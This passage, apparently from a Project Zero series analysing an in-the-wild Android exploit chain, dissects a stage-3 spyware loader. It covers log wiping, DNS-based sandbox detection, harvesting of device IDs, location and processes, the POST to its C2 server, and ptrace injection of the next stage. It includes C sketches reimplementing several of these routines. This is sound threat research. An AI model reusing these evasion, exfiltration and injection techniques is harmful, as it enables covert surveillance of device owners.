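        if (counts[d] < 1) all_ge1 = 0;
    }
    if (all_ge5)
        return PARCEL_CLEANUP_EXIT;
    if (all_ge1)
        return PARCEL_CLEANUP_SLEEP;     /* followed by sleep(0xFFFFFFFF) */
    return PARCEL_UNSPECIFIED;
}
```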

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.
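Because XOR is its own inverse, one routine both encodes and decodes state.parcel entries. The sketch below assumes each entry is a single 32-bit timestamp word XORed with 0xFF12EE34; the entry width and the function name are assumptions.

```c
#include <stddef.h>
#include <stdint.h>

#define PARCEL_XOR_KEY 0xFF12EE34u

/* Hypothetical helper: applying it twice restores the original entries. */
void parcel_xor(uint32_t *entries, size_t n) {
    for (size_t i = 0; i < n; i++)
        entries[i] ^= PARCEL_XOR_KEY;
}
```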

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and status information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file to.
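A minimal sketch of that directory choice, assuming the random pick is a uniform rand() % 5 over the five root paths listed for state.parcel (how the binary actually picks is not stated). choose_state_dir is a hypothetical name; the non-root branch reads the /proc/self/exe symlink and keeps its directory part.

```c
#define _POSIX_C_SOURCE 200809L
#include <libgen.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static const char *const ROOT_DIRS[] = {
    "/data/backup/", "/data/data/", "/data/", "/data/local/", "/data/local/tmp/",
};

/* Writes the chosen directory (with a trailing '/') to out. Returns 0 on success. */
int choose_state_dir(char *out, size_t outsz) {
    if (geteuid() == 0) {
        const char *d = ROOT_DIRS[rand() % 5];   /* random pick: assumption */
        if (strlen(d) + 1 > outsz)
            return -1;
        strcpy(out, d);
        return 0;
    }
    char exe[4096];
    ssize_t n = readlink("/proc/self/exe", exe, sizeof exe - 1);
    if (n < 0)
        return -1;
    exe[n] = '\0';
    const char *dir = dirname(exe);              /* directory of the binary */
    if (strlen(dir) + 2 > outsz)
        return -1;
    strcpy(out, dir);
    strcat(out, "/");
    return 0;
}
```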

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.
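The on-disk layout of uierrors.txt, [16-byte IV][encrypted hash table][CRC32 of the encrypted bytes], can be built and checked as sketched below. The AES256 step is left out, the standard IEEE CRC-32 and a little-endian trailer are assumptions, and pack_uierrors and check_uierrors are hypothetical names.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

static uint32_t crc32_ieee(const uint8_t *p, size_t n) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Builds [IV][ciphertext][CRC32(ciphertext)]; the caller frees the result. */
uint8_t *pack_uierrors(const uint8_t iv[16], const uint8_t *ct, size_t ct_len,
                       size_t *out_len) {
    size_t total = 16 + ct_len + 4;
    uint8_t *buf = malloc(total);
    if (!buf)
        return NULL;
    memcpy(buf, iv, 16);
    memcpy(buf + 16, ct, ct_len);
    uint32_t crc = crc32_ieee(ct, ct_len);
    for (int i = 0; i < 4; i++)
        buf[16 + ct_len + i] = (uint8_t)(crc >> (8 * i));   /* little-endian */
    *out_len = total;
    return buf;
}

/* Returns 1 if the 4-byte trailer matches the CRC32 of the ciphertext. */
int check_uierrors(const uint8_t *buf, size_t len) {
    if (len < 20)
        return 0;
    size_t ct_len = len - 20;
    uint32_t stored = 0;
    for (int i = 0; i < 4; i++)
        stored |= (uint32_t)buf[16 + ct_len + i] << (8 * i);
    return stored == crc32_ieee(buf + 16, ct_len);
}
```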

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

| Environment Variable Name | Meaning |
| --- | --- |
| | Address of the decrypted data block |
| def | Address of the function that sends logging messages to the C2 server |
| def2 | Address of the function that adds logging messages to the error and/or informational logging message queues |
| | Points to the decrypted block of hashtable keys |
| | Address of the function that performs inflate (decompress) |
| | Address of the function that performs deflate (compress) |
| 0x10 bytes at 0x228CC | |
| 0x10 bytes at 0x228DC | Pointer to the string representation of the hex_d_uuid |
| 0x10 bytes at 0x228F0 | Pointer to the C2 domain URL |
| 0x10 bytes at 0x22904 | Pointer to the port string for the C2 server |
| 0x10 bytes at 0x22918 | Pointer to the beginning of the certificate |
| 0x10 bytes at 0x2292C | |
| 0x10 bytes at 0x22940 | Pointer to +4AA in the decrypted data block |
| 0x10 bytes at 0x22954 | |
| 0x10 bytes at 0x22698 | Pointer to the user-agent string |
| | SELinux status, such as “selinux-init-read-fail” or “selinux-no-mdm” |
| | Set if there is no “” string in /init |
| | Set if the “” string is in /init |

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they are sent to the C2 server, either when stage 3 automatically reaches out to the C2 server or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2” adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.


This code is very diligent about cleaning up its tracks, both while it’s running and once it finishes. While it’s running, the binary forks a new process that is responsible for cleaning up logs while the other code executes. This process does the following to clean up stage 3’s tracks:

  • Connects to the socket /dev/socket/logd and clears all logs
  • Executes klogctl(5,0,0), which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlinks all of the files in the following directories:
      • /data/tombstones
      • /data/misc/audit
      • /data/system/dropbox
      • /data/anr
      • /data/log
  • Unlinks the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. The test function takes a pointer to the decrypted data block as its argument. First, it generates a random hostname of 8 to 16 lowercase Latin characters. It then calls getaddrinfo on this random hostname, looking for a host that causes getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It tries 3 different hostnames and bails if none of them returns EAI_NODATA. Some disconnected analysis sandboxes respond to all hostnames, so the code is trying to detect this type of malware analysis environment.
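A sketch of the hostname part of the DNS test, under stated assumptions: rand() stands in for whatever random source the binary uses, no TLD is appended, and the EAI_NODATA check is only compiled where the C library exposes that constant (glibc requires _GNU_SOURCE). Note that glibc typically reports a nonexistent name as EAI_NONAME rather than EAI_NODATA, so the outcome depends on the resolver library. The function names are hypothetical.

```c
#define _GNU_SOURCE            /* glibc only declares EAI_NODATA with this */
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>

/* Fills out (>= 17 bytes) with 8-16 random lowercase letters. */
void random_hostname(char *out) {
    int len = 8 + rand() % 9;
    for (int i = 0; i < len; i++)
        out[i] = (char)('a' + rand() % 26);
    out[len] = '\0';
}

/* Tries up to 3 random names; returns 1 and copies the name into found if
 * getaddrinfo reports EAI_NODATA for one of them, otherwise 0. */
int find_nodata_hostname(char found[17]) {
#ifdef EAI_NODATA
    for (int attempt = 0; attempt < 3; attempt++) {
        char name[17];
        struct addrinfo hints, *res = NULL;
        memset(&hints, 0, sizeof hints);
        hints.ai_family = AF_UNSPEC;
        random_hostname(name);
        int rc = getaddrinfo(name, NULL, &hints, &res);
        if (res)
            freeaddrinfo(res);
        if (rc == EAI_NODATA) {
            strcpy(found, name);
            return 1;
        }
    }
#endif
    (void)found;
    return 0;
}
```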

Once it finds a hostname that returns EAI_NODATA, stage 3 performs a DNS query with that hostname. The DNS server address is stored in the decrypted block passed as the first argument, at offset 0x14C7; in this binary, that address is the Google DNS server. The code connects to the DNS server via a socket, sends a Type A query for the randomly generated hostname, and parses the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”. If the code receives NXDomain from the DNS server, it proceeds with the code path that communicates with the C2 server.
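The Type A query and the NXDomain check follow the standard DNS wire format from RFC 1035. The sketch below builds a single-question query and tests a response header for RCODE 3 (Name Error, commonly called NXDOMAIN). The helper names and the way the transaction ID is chosen are assumptions, and sending the packet to the server is not shown.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Builds a recursive A/IN query for name. Returns its length, or 0 if buf
 * is too small or a label is empty or longer than 63 bytes. */
size_t build_dns_a_query(uint16_t id, const char *name, uint8_t *buf, size_t cap) {
    size_t n = 0;
    if (cap < 12 + strlen(name) + 2 + 4)
        return 0;
    buf[n++] = (uint8_t)(id >> 8);       /* transaction ID */
    buf[n++] = (uint8_t)(id & 0xFF);
    buf[n++] = 0x01;                     /* flags: RD (recursion desired) */
    buf[n++] = 0x00;
    buf[n++] = 0x00;                     /* QDCOUNT = 1 */
    buf[n++] = 0x01;
    memset(buf + n, 0, 6);               /* ANCOUNT, NSCOUNT, ARCOUNT = 0 */
    n += 6;
    for (const char *p = name; *p; ) {   /* QNAME as length-prefixed labels */
        size_t lab = strcspn(p, ".");
        if (lab == 0 || lab > 63)
            return 0;
        buf[n++] = (uint8_t)lab;
        memcpy(buf + n, p, lab);
        n += lab;
        p += lab;
        if (*p == '.')
            p++;
    }
    buf[n++] = 0x00;                     /* root label ends QNAME */
    buf[n++] = 0x00; buf[n++] = 0x01;    /* QTYPE = A */
    buf[n++] = 0x00; buf[n++] = 0x01;    /* QCLASS = IN */
    return n;
}

/* Returns 1 if resp answers query id with RCODE 3 (NXDOMAIN). */
int is_nxdomain(const uint8_t *resp, size_t len, uint16_t id) {
    if (len < 12)
        return 0;
    if ((((unsigned)resp[0] << 8) | resp[1]) != id)
        return 0;
    if (!(resp[2] & 0x80))               /* QR bit: must be a response */
        return 0;
    return (resp[3] & 0x0F) == 3;
}
```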

Handshake with the C2 Server

The C2 server hostname and port are read from the decrypted data block: the port number is at offset 0x84 and the hostname at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties, which it does in two different ways:

  • Call __system_property_get by doing dlopen(/system/lib/ and dlsym('__system_property_get').
  • Executing getprop in popen

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service this way, you need to know the function’s code, which is essentially the position at which the function is listed in the service’s AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each Android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for SDK versions 8-20, 5 for SDK version 21, and 7 for SDK versions 22-29.
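The per-SDK lookup can be pictured as a simple range table. The sketch below encodes only the three getSubscriberId ranges quoted above and formats the resulting shell command; the function names are hypothetical, and the binary’s real table covers more methods.

```c
#include <stdio.h>

/* Code of getSubscriberId in iphonesubinfo for a given SDK version,
 * or -1 outside the 8-29 range covered above. */
int subscriber_id_code(int sdk) {
    if (sdk >= 8 && sdk <= 20) return 3;
    if (sdk == 21) return 5;
    if (sdk >= 22 && sdk <= 29) return 7;
    return -1;
}

/* Formats e.g. "service call iphonesubinfo 7". Returns 0 on success. */
int build_service_call(int sdk, char *out, size_t outsz) {
    int code = subscriber_id_code(sdk);
    if (code < 0)
        return -1;
    int n = snprintf(out, outsz, "service call iphonesubinfo %d", code);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}
```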

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.
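A sketch of the MAC-address half of this collection, reading each interface’s address file under /sys/class/net. The function name is hypothetical, and how the binary obtains each interface’s IP address is not described, so that part is omitted.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <stdio.h>
#include <string.h>

/* Writes "<interface> <mac>" lines to out (if non-NULL) for each entry in
 * /sys/class/net. Returns the number of interfaces read, or -1. */
int list_interface_macs(FILE *out) {
    DIR *d = opendir("/sys/class/net");
    if (!d)
        return -1;
    int count = 0;
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        if (de->d_name[0] == '.')
            continue;                        /* skip "." and ".." */
        char path[512], mac[64] = "";
        snprintf(path, sizeof path, "/sys/class/net/%s/address", de->d_name);
        FILE *f = fopen(path, "r");
        if (!f)
            continue;
        if (fgets(mac, sizeof mac, f))
            mac[strcspn(mac, "\n")] = '\0';
        fclose(f);
        if (out)
            fprintf(out, "%s %s\n", de->d_name, mac);
        count++;
    }
    closedir(d);
    return count;
}
```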

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid
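On Linux-based systems, including Android, these fields are available from /proc/<pid>/status. The sketch below assumes that file is the source (the analysis does not say which /proc file the binary reads) and records the real UID and GID, the first values on the Uid: and Gid: lines; the names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct proc_info {
    char name[64];
    int pid, ppid;
    unsigned uid, gid;     /* real IDs: first value on the Uid:/Gid: lines */
    char groups[256];      /* raw supplementary group list */
};

int read_proc_status(int pid, struct proc_info *info) {
    char path[64], line[512];
    snprintf(path, sizeof path, "/proc/%d/status", pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    memset(info, 0, sizeof *info);
    while (fgets(line, sizeof line, f)) {
        if (sscanf(line, "Name: %63s", info->name) == 1) continue;
        if (sscanf(line, "Pid: %d", &info->pid) == 1) continue;
        if (sscanf(line, "PPid: %d", &info->ppid) == 1) continue;
        if (sscanf(line, "Uid: %u", &info->uid) == 1) continue;
        if (sscanf(line, "Gid: %u", &info->gid) == 1) continue;
        if (strncmp(line, "Groups:", 7) == 0) {
            const char *g = line + 7;
            while (*g == ' ' || *g == '\t')
                g++;
            snprintf(info->groups, sizeof info->groups, "%s", g);
            info->groups[strcspn(info->groups, "\n")] = '\0';
        }
    }
    fclose(f);
    return info->pid > 0 ? 0 : -1;
}

/* Visits every numeric /proc entry; returns how many were parsed. */
int walk_processes(void (*cb)(const struct proc_info *)) {
    DIR *d = opendir("/proc");
    if (!d)
        return -1;
    int count = 0;
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        if (!isdigit((unsigned char)de->d_name[0]))
            continue;
        struct proc_info pi;
        if (read_proc_status(atoi(de->d_name), &pi) == 0) {
            if (cb)
                cb(&pi);
            count++;
        }
    }
    closedir(d);
    return count;
}
```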

Logging Information

As described in the Error Handling & Logging section, whenever the binary encounters an error, it creates an error message. The binary sends a maximum of 0x1F of these error messages back to the C2 server. It also sends a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to error messages, except that they document a condition that is less severe than an error; the developers built this distinction into their code.
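A minimal sketch of the two capped queues, assuming messages beyond the 0x1F limit are simply dropped when added (the analysis only says that at most 0x1F of each kind are sent). The “code:text” message format and all names here are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define MAX_QUEUED 0x1F   /* at most 0x1F messages of each kind are sent */

enum log_kind { LOG_ERROR, LOG_INFO };

struct log_queue {
    char msgs[MAX_QUEUED][128];
    int count;
    int dropped;          /* messages that did not fit (assumed behavior) */
};

struct log_state {
    struct log_queue q[2];   /* indexed by enum log_kind */
};

void log_init(struct log_state *s) {
    memset(s, 0, sizeof *s);
}

/* Queues one message; returns 0 if stored, -1 if that queue is full. */
int log_add(struct log_state *s, enum log_kind kind, int code, const char *text) {
    struct log_queue *q = &s->q[kind];
    if (q->count >= MAX_QUEUED) {
        q->dropped++;
        return -1;
    }
    snprintf(q->msgs[q->count++], sizeof q->msgs[0], "%d:%s", code, text);
    return 0;
}
```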

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. Each compressed “message” has the compressedMessage structure shown below. The messageCode identifies the type of information contained in the message. It is calculated by taking the CRC32 of the 0x10 bytes at offset 0x1CD8 in the decrypted data block and adding the “identification code”.

struct compressedMessage {
    uint compressedDataLength;
    uint uncompressedDataLength;
    uint messageCode;
    BYTE * dataPointer;
    BYTE data[4096];
};
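Because a message code is just an identification code offset by a CRC32, encoding and decoding reduce to one addition and one subtraction. A hedged sketch, assuming the standard IEEE CRC-32 and unsigned 32-bit wraparound; the function names are hypothetical. For requests the seed would be the 0x10 bytes at offset 0x1CD8 of the decrypted data block.

```c
#include <stddef.h>
#include <stdint.h>

static uint32_t crc32_ieee(const uint8_t *p, size_t n) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* messageCode = crc32(seed) + identification code (wraps modulo 2^32). */
uint32_t encode_message_code(const uint8_t seed[16], uint32_t id) {
    return crc32_ieee(seed, 16) + id;
}

/* The receiving side subtracts the same CRC to recover the code. */
uint32_t decode_message_code(const uint8_t seed[16], uint32_t code) {
    return code - crc32_ieee(seed, 16);
}
```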


Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.
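The post-compression framing can be sketched as two steps: reverse the bytes of each 32-bit word, then (after AES256, which is not shown) prepend the random IV. Treating the buffer as whole 32-bit words and leaving any trailing partial word untouched are assumptions, as are the helper names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint32_t bswap32_portable(uint32_t v) {
    return (v >> 24) | ((v >> 8) & 0x0000FF00u) |
           ((v << 8) & 0x00FF0000u) | (v << 24);
}

/* Reverses the bytes of every complete 32-bit word in place. */
void swap_words(uint8_t *buf, size_t len) {
    for (size_t i = 0; i + 4 <= len; i += 4) {
        uint32_t w;
        memcpy(&w, buf + i, 4);
        w = bswap32_portable(w);
        memcpy(buf + i, &w, 4);
    }
}

/* Output layout: [16-byte IV][ciphertext]. Returns bytes written, or 0. */
size_t frame_with_iv(const uint8_t iv[16], const uint8_t *ct, size_t ct_len,
                     uint8_t *out, size_t cap) {
    if (cap < 16 + ct_len)
        return 0;
    memcpy(out, iv, 16);
    memcpy(out + 16, ct, ct_len);
    return 16 + ct_len;
}
```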

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive



Cookie: %s

The “Cookie” field contains two values from the decrypted data block: sid and uid. Both values are stored base64 encoded in the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.
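The first checks on the response can be sketched as follows: reject anything other than HTTP 200, then split the body into the 0x10-byte IV and the ciphertext. Decryption with the key at offset 0x48A, the bswap32 pass, and inflate are not shown, and the helper names are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>

/* Status code from an HTTP/1.x status line, or -1 if malformed. */
int http_status(const char *status_line) {
    int major, minor, code;
    if (sscanf(status_line, "HTTP/%d.%d %d", &major, &minor, &code) != 3)
        return -1;
    return code;
}

/* Returns -1 for a non-200 status or a body shorter than the IV. */
int split_response(const char *status_line, const unsigned char *body, size_t len,
                   const unsigned char **iv, const unsigned char **ct,
                   size_t *ct_len) {
    if (http_status(status_line) != 200 || len < 16)
        return -1;
    *iv = body;               /* first 0x10 bytes: AES IV */
    *ct = body + 16;          /* remainder: AES-256 ciphertext */
    *ct_len = len - 16;
    return 0;
}
```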

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code receives back either an executable file or a set of commands, which it then “processes”. The response is parsed differently based on the “message code” in the header of the response. This message code is similar to the one described in the “Constructing the Request” section: an identification code plus the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts it from the message code. The result determines how the contents of the response are treated. Most of the message codes select different ways for the response to be saved to the device and then executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Writes the buffer of the response to a file whose name is the name from step #2 with “abc” appended: /mnt/XXXXXXabc
  4. Writes a specific value from memory to a file whose name is the name from step #2 with “xyz” appended: /mnt/XXXXXXxyz. This value can be changed through the second function exported by the stage 3 binary: d.
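Steps 2 to 4 derive two sibling file names from one mkstemp result. A sketch of just the naming, with a hypothetical helper that takes the directory as a parameter so it can run outside /mnt; writing the payload and the “xyz” value is left out, and the file created by mkstemp itself is simply closed here.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Fills abc and xyz with "<dir>/XXXXXXabc" and "<dir>/XXXXXXxyz", where
 * XXXXXX is the unique part chosen by mkstemp. Returns 0 on success. */
int func1_names(const char *dir, char abc[256], char xyz[256]) {
    if (strlen(dir) + sizeof "/XXXXXXabc" > 256)
        return -1;                       /* template plus suffix must fit */
    char base[256];
    snprintf(base, sizeof base, "%s/XXXXXX", dir);
    int fd = mkstemp(base);              /* replaces XXXXXX in place */
    if (fd < 0)
        return -1;
    close(fd);
    snprintf(abc, 256, "%sabc", base);   /* payload file */
    snprintf(xyz, 256, "%sxyz", base);   /* file for the value set via d */
    return 0;
}
```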

func2 - Fork child process and inject code using ptrace.

This function forks a new process in which the child calls the function init from an ELF library, and the parent then injects the code from the response into the child process using ptrace. The ELF library that the child opens with dlopen, and whose init function it calls, is named /system/bin/%016lx%016lx, where both values are the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function writes the buffer either to the file path provided in the third argument or to a newly generated file path. When generating a new temporary file name, the code walks the following list of directories, starting with /cache, and creates the temporary file with mkstemp(“%s/XXXXXX”) in the first directory that it can stat:

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function in the fourth argument. It then sets the SELinux attributes of the file to those passed in the fifth argument.
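The directory fallback and permission step of func3 might look roughly like this. It is a sketch under assumptions: the helper names are hypothetical, the branch that uses a caller-provided path is omitted, and the SELinux labelling from the fifth argument is not implemented.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Candidate directories, in the order listed above. */
const char *const FUNC3_DIRS[] = {
    "/cache", "/mnt/secure/asec", "/mnt/secure/staging", "/mnt/secure",
    "/mnt/obb", "/mnt/asec", "/mnt", "/storage",
};

/* Creates a temp file in the first stat-able directory, writes buf, and
 * applies mode. path receives the file name. Returns 0 on success. */
int func3_write(const char *const *dirs, size_t ndirs, const void *buf,
                size_t len, mode_t mode, char path[256]) {
    struct stat st;
    for (size_t i = 0; i < ndirs; i++) {
        if (stat(dirs[i], &st) != 0)
            continue;                     /* try the next candidate */
        if (strlen(dirs[i]) + sizeof "/XXXXXX" > 256)
            return -1;                    /* path would not fit */
        snprintf(path, 256, "%s/XXXXXX", dirs[i]);
        int fd = mkstemp(path);           /* only the first stat-able dir is used */
        if (fd < 0)
            return -1;
        int ok = write(fd, buf, len) == (ssize_t)len && fchmod(fd, mode) == 0;
        close(fd);
        return ok ? 0 : -1;
    }
    return -1;
}

int func3_default(const void *buf, size_t len, mode_t mode, char path[256]) {
    return func3_write(FUNC3_DIRS, sizeof FUNC3_DIRS / sizeof FUNC3_DIRS[0],
                       buf, len, mode, path);
}
```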

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked, and that child process executes the file by calling execve on it.
  • 0x2713: The response is an ELF file. The file is written to a temporary file on the device using func3. A child process is forked, and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@framework@boot.oat), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath; if it doesn’t exist, delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@framework@boot.oat), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.


That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, because so much detailed information is sent to the C2 server before stage 4 is returned to the device, it seems unlikely that we could determine the correct values needed to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used only publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploits for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Windows Exploits

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

